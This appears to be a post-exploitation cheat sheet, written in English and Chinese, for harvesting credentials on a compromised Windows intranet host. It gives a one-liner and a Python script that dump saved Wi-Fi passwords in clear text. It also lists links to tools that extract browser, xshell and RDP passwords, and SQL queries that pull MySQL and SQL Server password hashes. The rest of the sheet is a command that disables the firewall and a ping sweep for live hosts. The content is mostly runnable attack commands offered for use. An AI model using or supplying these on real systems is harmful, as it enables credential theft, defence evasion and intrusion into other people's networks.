Intranet information collection supplement (Windows)

Intranet information collection supplement

1. Get the account password of the computer connected to Wifi
1) cmd command

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do  @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

2) python script

# -*- coding: UTF-8 -*-
import os
import importlib,sys
import csv
importlib.reload(sys)
 
# 获取电脑连接过的所有wifi名称和密码
def checkWIFI():
    list = []
    # 获取所有的wifi名称
    message = os.popen('netsh wlan show profiles').readlines()
    print('正在解析中，请稍等……')
    for i in message:
        result = i.strip().encode().decode("utf-8")

        if result.find(u"所有用户配置文件 : ") != -1:
            command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
            try:
                per_wifi = os.popen(command).readlines()
            except:
                per_wifi = []
            
            for j in per_wifi:
                passwd = j.strip().encode().decode("utf-8")
 
                if passwd.find(u"关键内容            :") != -1:# 密码字符串不为空时
                    if passwd[18:] != '':
                        list_temp = []
                        list_temp.append(result[11:])
                        list_temp.append(passwd[18:])
                        list.append(list_temp)
    return list

if __name__ == "__main__":
    list = checkWIFI()
    print("返回结果如下：")
    filename='./Result/conWifiInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','wifi名称', '密码'])
        i = 0
        for j in list:
            i = i + 1
            print(str(i) + "、wifi名称：" + j[0] + "，密码：" + j[1])
            csv_writer.writerow([ i, j[0], j[1]])

2. Get the account password stored in the browser
2.1 LaZagne

一键抓取目标机器上的所有明文密码
https://github.com/AlessandroZ/LaZagne

2.2 Special tools

http://www.nirsoft.net/utils/web_browser_password.html  火狐浏览器
http://www.nirsoft.net/utils/chromepass.html  谷歌浏览器 

2.3 Python scripting

https://github.com/Potato-py/getIntrInfo

3. Obtain the account password for 3389 and xshell connection
3.1 AsteriskPassword:
Asterisk password viewer, you can view * passwords saved in xshell, mysql and other databases

3.2 xshell, xftp password cracking:
https://github.com/dzxs/Xdecrypt

4. Get mysql account password

在mysql数据库下执行以下语句，然后解密
select Host,User,Password,authentication_string from mysql.user;

5. Get the sqlserver account password

SELECT name,password_hash FROM master.sys.sql_logins;

6. Firewall operation

1) Check the firewall status

netsh firewall show config

2) Turn off the firewall

netsh firewall set opmode mode=disable 

7. ICMP scan for live hosts:

for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"